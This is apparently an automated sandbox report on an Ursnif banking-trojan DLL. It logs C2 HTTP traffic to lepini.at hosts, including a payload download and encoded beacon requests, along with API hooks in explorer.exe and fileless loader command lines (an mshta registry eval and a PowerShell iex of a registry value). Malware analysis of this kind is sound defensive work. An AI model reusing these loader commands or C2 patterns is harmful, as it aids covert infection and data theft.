d6 4f 23 88 22 6a f9 66 a9 c1 3c e9 fc 7b ce cc 54 43 8c 2f bd ad 0d 15 a1 66 31 c1 b8 d6 ca 6a 93 c4 c6 e5 39 e9 50 45 20 e0 64 91 53 c9 db 09 1c 2b d6 9b 2d e0 ad 37 06 ae 91 24 e2 69 a4 d2 93 1c 44 80 16 71 fa 3c 67 fb e8 4a d7 70 f8 82 bf 04 04 9f b5 7e 22 ab 3a 30 4a a1 ce 1c 52 dd d8 67 e3 7e bf 12 f4 70 32 42 38 f9 0f ca 7c 2e 8e 25 f4 12 5f 3a ef ba f7 e7 4f 86 4b a9 ab 1a 10 d7 58 0a ab 2e 89 d9 e5 d3 d9 72 00 98 fe d8 61 87 da db 94 18 46 95 12 da 6c 84 01 36 c7 3b 71 7a fd b0 fb b2 a1 e2 36 cb 9c 26 11 90 a5 3c 87 19 ba b7 2c 05 db 37 7d 69 27 18 df f3 20 ce 00 4b Data Ascii: 758P@ KppwgN~%Pn;%],;C]KeS3x(Iv{KY,fRfy{.3%4dTH)~/8s;:U`dYLW?l,5J`N{t/2a\|a{y\2Zod4,\| f 2bMgb)!E0}TT3ze\f^-rpMtaD]/#O6^hc,QxtC-ax"{Zu4:8\|_qI9mSLUXR\4{Q85c+IxXIGAOZb(hKlDXQ:LR#5>})tL.jP1 \#bw}D_urM?aZ%_j/Tmj?r;:QZHN!I(nH] L]nyJrU`ufPfTiX`va=iV0OC:+>H`,@9fIoKu>@u!v-7YAdZr53={EC@:zzu.O\3[!+>+?*,yF) v UbO#"jf<{TC/f1j9PE dS+-7$iDq<gJp~":0JRg~p2B8\|.%_:OKX.raFl6;qz6&<,7}i' K

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.4	49800	45.138.24.6	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jan 22, 2021 10:25:02.429384947 CET	9058	OUT	GET /jvassets/xI/t64.dat HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: c56.lepini.at
Jan 22, 2021 10:25:02.715879917 CET	9068	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 22 Jan 2021 09:25:02 GMT Content-Type: application/octet-stream Content-Length: 138820 Last-Modified: Mon, 28 Oct 2019 09:43:42 GMT Connection: close ETag: "5db6b84e-21e44" Accept-Ranges: bytes Data Raw: 17 45 7e 72 ac 5b ed 66 e1 de 31 9e 70 18 b7 1a 77 c0 be b3 e2 43 ff 7c d8 16 7f 6f 35 a2 d1 a5 d2 ec 0d 0c de 58 84 1a f3 53 04 f0 65 cb 76 1f 35 85 a0 7d 1d f2 44 63 de 89 f3 f1 eb d3 60 21 68 3d 3a 93 e1 55 94 db 4c d2 f2 b4 3e 34 48 eb e8 47 7b 53 14 54 86 87 a3 d2 0d 55 0c d0 4f 6f 51 73 eb e2 f9 f4 9b f0 49 af 3d a0 bd ba 48 52 29 a2 84 33 75 9e 48 16 a7 b3 00 58 91 bf bf ea 49 85 ff c7 58 36 df 5b 13 ec c2 c6 92 56 72 82 53 68 a1 ca a8 33 3e e7 8b 8e 6f fa 4b 85 a0 7f bb 5c de 12 c3 97 40 27 18 f2 b2 95 91 d8 b7 45 cf 2a 5f 95 76 5b fc 02 c1 9d d7 e5 7f ee ec f5 a0 52 7b 4d 4d ae da 70 b4 71 95 b6 39 2e 38 47 c0 ab 5e fe cf a1 6a 5c a5 3c 8f 1b 97 0a 2a 41 5f 6e 2e 85 b4 8e 24 d6 6a 1c cb 43 8c ca 75 7d 09 57 73 3c a2 b8 0b 18 00 21 c1 f5 fc e4 2b 04 14 51 c3 36 ea 80 55 0a 28 82 e4 56 51 91 99 bf 11 ae 36 06 cd 81 44 e0 ad db 69 d6 8e 24 28 ee 4c 0d 81 69 8b 96 c0 52 cd ed ec 31 e8 7f 08 d8 ff 0a 82 4d 1d fa a0 28 3c 3f 5f 53 cb 64 ea 5d 7c c7 f0 0f 28 71 5a f4 60 b7 7b f3 e1 19 5b 7b be d1 62 af ef 2f ad 3b 22 a8 03 e7 9f 3d e5 da ca 8b 1a 9c 2c fd 76 89 a9 f7 a5 7b 6a b4 47 62 bf 64 5d 54 26 01 9a 1d 3b b0 97 db c5 c1 dd 94 52 d0 b2 77 e0 f7 00 8d c1 99 02 69 f4 b2 87 b2 0c 68 b3 9d b6 e6 a6 9f 58 b0 52 f8 5e b5 ac 1e 36 41 bd bc f9 5d 3a 2b 5a 40 60 9a 48 c1 b3 4a df cc 81 65 53 4e e4 9a 80 8b dd 8f 43 eb 11 23 73 1b 1b c1 99 89 21 94 4c a5 84 c3 13 96 ad 5d 82 20 a4 a4 3b dd 1e 43 74 c6 42 11 7a 8a f2 93 8b 7e 24 73 17 d9 c7 eb 47 18 47 41 4f a2 f1 bc 52 cc 35 f2 c2 73 3e e5 32 8a b5 c7 7c 3b d4 88 bd aa 47 48 66 2e 00 bd 3f fc 08 b4 49 98 e3 36 db f0 33 4c 40 2b cc 59 2a b5 ba 73 58 27 de a0 31 0e 6d 63 70 19 7b 5f 67 00 54 79 89 7f 42 21 df 6e 23 e1 54 43 4a 09 00 77 ac fb e4 2e a8 6d 07 21 b3 a0 98 ad 40 d2 34 64 c9 c2 62 14 7c 45 eb a0 65 98 c1 18 a1 6a af 69 0a a2 bb 50 42 96 c1 d7 02 58 6d f4 b1 15 90 f6 50 9c 6a fd d4 2e 5e a7 4a cb 67 59 63 74 77 99 de e0 c0 d5 5c 9d a7 89 1b 90 39 29 23 21 3b c4 35 f1 49 9e 67 f3 ce fe 1d 0a 67 69 06 13 13 30 ab e6 c6 f4 c9 7e 94 48 5b a1 f7 5f 27 1f 03 ac 85 e1 0e b1 bf 6e e1 1c 5a 24 cc b2 53 fd 61 58 e3 87 0b 85 9e 03 94 f6 2a bd 92 53 09 77 f8 5e d3 c9 b7 19 42 4e e6 2a 67 af 27 4e 01 de 6a fc 1e 82 0c 7e 45 7b e8 1d 97 82 9b 5c 14 96 d2 82 dd 53 15 1e 84 41 01 4f 0f 32 ac ee b7 85 96 4c e9 dc b0 42 3c 93 a6 0b a3 79 cb 7b 2c d1 21 6f c1 6a 38 48 d7 37 8f 35 b8 1d 7a e7 eb 63 bc 4e 6b b6 23 aa 9c fd 32 03 46 e2 37 47 49 c2 35 a1 48 7e 98 49 6a b4 98 e7 cb 33 dd 1a be 5a c8 ea a7 44 33 9b e3 a6 84 da 68 ec bf 93 03 88 f9 6e 02 17 a6 96 46 ad ae 25 c2 bb 97 7a 57 35 aa 0a 42 b5 c3 8a 35 af 20 1b 1a b9 c6 99 99 8a b2 b6 46 1c 70 a0 53 c2 e9 a2 e6 ad a4 8f d5 11 da 74 60 13 7c 55 4d 42 1c c6 a4 47 a8 4e 27 67 a4 37 b3 0e ca f5 b1 9a a5 de e3 07 25 55 07 ff 18 b3 17 44 8b a0 af e3 f5 ff 75 b8 f2 2b 4d 9e f9 ad 07 c0 5e d7 1b ab 81 e4 99 93 ac a9 63 2f 4e 27 18 d0 dd 29 f7 28 98 b1 c3 5e 52 9e d4 01 1b 9f ba 6d 7d 24 b8 cc 84 0e 03 07 2e 3a ba b5 ad 8b ae 57 ce 78 7b aa 0f 07 5f ee 2a 4a 6b 0d f8 40 bb 79 91 71 5d ae 1b 1d 3c bf b9 e2 9b d4 4c 6c 52 55 e3 59 22 40 9a 6f cc 9a 14 bb 63 ad 00 8f bf cd 7b ca 18 ce c6 df 21 08 86 ed 93 17 79 b7 6d 89 0c ba 64 8a 93 dd fa 1b 07 69 84 31 87 f9 ae 59 a4 f8 ed 03 62 6f 2a fa 54 99 38 81 d4 e3 dc e8 39 d4 b0 62 81 c2 49 a1 Data Ascii: E~r[f1pwC\|o5XSev5}Dc`!h=:UL>4HG{STUOoQsI=HR)3uHXIX6[VrSh3>oK\@'E_v[R{MMpq9.8G^j\<A_n.$jCu}Ws<!+Q6U(VQ6Di$(LiR1M(<?_Sd]\|(qZ`{[{b/;"=,v{jGbd]T&;RwihXR^6A]:+Z@`HJeSNC#s!L] ;CtBz~$sGGAOR5s>2\|;GHf.?I63L@+YsX'1mcp{_gTyB!n#TCJw.m!@4db\|EejiPBXmPj.^JgYctw\9)#!;5Iggi0~H[_'nZ$SaXSw^BNg'Nj~E{\SAO2LB<y{,!oj8H75zcNk#2F7GI5H~Ij3ZD3hnF%zW5B5 FpSt`\|UMBGN'g7%UDu+M^c/N')(^Rm}$.:Wx{_Jk@yq]<LlRUY"@oc{!ymdi1Ybo*T89bI

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.4	49801	45.138.24.6	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jan 22, 2021 10:25:08.233155966 CET	9238	OUT	GET /api1/qid4UkFjrmJwDqv1uGoy3/_2BUJEVRCzS4dgw_/2BQScQk8a3HbiWi/d_2FOUrdxgv_2FzWHk/Apf0FwjNI/XCjSe3QcK9lg8PEDHYq_/2BEZPUJgDqlWZMm5T6e/5VAYvXDHpTHy9yII7VkiV8/_2BPKcMGMz7Ef/Vq5I_2Bu/jg1FflNR1bMph_2B7mMw8J7/1wxMorc_2F/N6CisPjn0a1IvUWNq/qjvzUpOhQ3cR/g18ZLbBaZpr/HqIkmdt9eu1lN1/4tABZghNsoNFyNad4ZlYW/GQkzB4t48KvSwznE/J6JNvAHQJAsplh2/rVWvzj4OOGDDMz5k/E HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Host: api3.lepini.at
Jan 22, 2021 10:25:08.957587004 CET	9238	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 22 Jan 2021 09:25:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.4	49802	45.138.24.6	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jan 22, 2021 10:25:09.103694916 CET	9239	OUT	POST /api1/Ct0R_2Fx9NzTLjO/AAVczaEeXM_2F0PHvI/q2A7GpbWq/QRkIGlX7lHetqaCvuTxL/ZcPM1sCMitgD7TpJ4lL/YaaCrfmGr7HSdfEDFBfZy_/2F6yiEd5nRfk_/2FyBL0Qi/YvC2A5PzJxWwGDWFfurX0IH/Pl4gbL8NNR/pL5PpYu5LBw4qrHSp/5GLoVTygQHxi/lMsRYGiVP_2/BVFS_2BKJaP3UA/ShYtgHcZ3ceFWWHUPV6JY/AjkOe7pkq3uVlpG4/TAfeBct56eabx37/kmJm57Oum_2FZFTOYP/K3KMyMRiN/6VsuEdtgXSIPx_2FOzhO/Wfirq HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Content-Length: 2 Host: api3.lepini.at
Jan 22, 2021 10:25:09.816137075 CET	9240	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 22 Jan 2021 09:25:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 37 63 0d 0a 90 77 a9 68 21 f0 f4 0f 9e 3b 17 d2 0c a4 65 2b 69 04 e1 b2 c6 7c 80 fe b8 7a f5 35 19 81 0b 6e ce 8e e6 72 37 f5 5d 03 a8 3f 76 b2 f6 eb 27 70 cb ae 35 10 2f c2 39 44 d3 16 7d b8 17 7e fc 95 cf 40 0d 7e 88 69 f0 f4 40 b0 c0 2a 3f 97 28 b6 bd 0f 45 41 ed c4 f3 f3 9c f9 b5 4c 3f c8 d7 23 ee 16 62 43 d4 5f 0a e9 a4 07 47 ff 47 4c a7 65 c7 a8 77 d9 17 cc bf 37 4e 90 3c 13 0d 0a 30 0d 0a 0d 0a Data Ascii: 7cwh!;e+i\|z5nr7]?v'p5/9D}~@~i@*?(EAL?#bC_GGLew7N<0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.4	49803	45.138.24.6	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jan 22, 2021 10:25:20.316462040 CET	9241	OUT	POST /api1/Y90IJ6cExB9qSgb/oNO0xdo8DXz1Gn7txC/ImxUnG_2B/FZLeWtZNMElpVIuMqsnD/ao9u_2BNz2Md9owKgIJ/zqApHMUbTazF8lkfM9kcPq/qmmDW9ik_2BeR/IwLTkS5a/9sA5dMbi2g7XVJOYbdMFryz/Axg7R8Bya7/R_2Bez5N_2BloAFw1/nDHFDKFrL6uR/NHFAwY9xPPf/gYWUNVO_2Fet69/EzNj4y3hORXVaLIROU2rT/Tl88OiHfGE5izZCW/UtFCHgfx4UGK4LP/RIc5xQGuWKkcO34Nan/otFHvPC_2/FKpxZb_2FurG4qdoHPVM/kuGo4 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=213777021142641037752157197084 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Content-Length: 675 Host: api3.lepini.at
Jan 22, 2021 10:25:20.729298115 CET	9242	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 22 Jan 2021 09:25:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jan 22, 2021 10:22:30.214939117 CET	151.101.1.44	443	192.168.2.4	49763	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jan 22, 2021 10:22:30.214939117 CET	151.101.1.44	443	192.168.2.4	49763	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Jan 22, 2021 10:22:30.218070030 CET	151.101.1.44	443	192.168.2.4	49762	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jan 22, 2021 10:22:30.218070030 CET	151.101.1.44	443	192.168.2.4	49762	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Jan 22, 2021 10:22:30.219417095 CET	151.101.1.44	443	192.168.2.4	49764	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jan 22, 2021 10:22:30.219417095 CET	151.101.1.44	443	192.168.2.4	49764	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Jan 22, 2021 10:22:30.219907999 CET	151.101.1.44	443	192.168.2.4	49760	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jan 22, 2021 10:22:30.219907999 CET	151.101.1.44	443	192.168.2.4	49760	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Jan 22, 2021 10:22:30.220422029 CET	151.101.1.44	443	192.168.2.4	49759	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jan 22, 2021 10:22:30.220422029 CET	151.101.1.44	443	192.168.2.4	49759	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Jan 22, 2021 10:22:30.227138996 CET	151.101.1.44	443	192.168.2.4	49761	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jan 22, 2021 10:22:30.227138996 CET	151.101.1.44	443	192.168.2.4	49761	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	explorer.exe
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	explorer.exe
CreateProcessAsUserW	EAT	explorer.exe
CreateProcessAsUserW	INLINE	explorer.exe
CreateProcessW	EAT	explorer.exe
CreateProcessW	INLINE	explorer.exe
CreateProcessA	EAT	explorer.exe
CreateProcessA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	7FFABB035200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	4DAC590

Process: explorer.exe, Module: KERNEL32.DLL

Function Name	Hook Type	New Data
CreateProcessAsUserW	EAT	7FFABB03521C
CreateProcessAsUserW	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessW	EAT	7FFABB035200
CreateProcessW	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessA	EAT	7FFABB03520E
CreateProcessA	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00

Process: explorer.exe, Module: WININET.dll

Function Name	Hook Type	New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	7FFABB035200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	4DAC590

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6000 Parent PID: 5944

General

Start time:	10:22:19
Start date:	22/01/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll'
Imagebase:	0xa30000
File size:	120832 bytes
MD5 hash:	2D39D4DFDE8F7151723794029AB8A034
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: regsvr32.exe PID: 2628 Parent PID: 6000

General

Start time:	10:22:20
Start date:	22/01/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32.exe /s C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll
Imagebase:	0x970000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.860537429.0000000005B28000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.860574233.0000000005B28000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.860667381.0000000005B28000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.860601592.0000000005B28000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.860502446.0000000005B28000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.860680858.0000000005B28000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000002.998924828.0000000005FA0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.876294685.00000000059AB000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.938337595.0000000003320000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.860649674.0000000005B28000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.860628580.0000000005B28000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: cmd.exe PID: 4828 Parent PID: 6000

General

Start time:	10:22:20
Start date:	22/01/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 4112 Parent PID: 4828

General

Start time:	10:22:20
Start date:	22/01/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Internet Explorer\iexplore.exe
Imagebase:	0x7ff7b2780000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 6076 Parent PID: 4112

General

Start time:	10:22:21
Start date:	22/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4112 CREDAT:17410 /prefetch:2
Imagebase:	0x1220000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 5620 Parent PID: 4112

General

Start time:	10:23:52
Start date:	22/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4112 CREDAT:82962 /prefetch:2
Imagebase:	0x1220000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 6156 Parent PID: 4112

General

Start time:	10:23:59
Start date:	22/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4112 CREDAT:82970 /prefetch:2
Imagebase:	0x1220000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 4700 Parent PID: 4112

General

Start time:	10:24:06
Start date:	22/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4112 CREDAT:17432 /prefetch:2
Imagebase:	0x1220000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: mshta.exe PID: 5960 Parent PID: 3424

General

Start time:	10:24:15
Start date:	22/01/2021
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Imagebase:	0x7ff644740000
File size:	14848 bytes
MD5 hash:	197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: powershell.exe PID: 6988 Parent PID: 5960

General

Start time:	10:24:17
Start date:	22/01/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Imagebase:	0x7ff7bedd0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
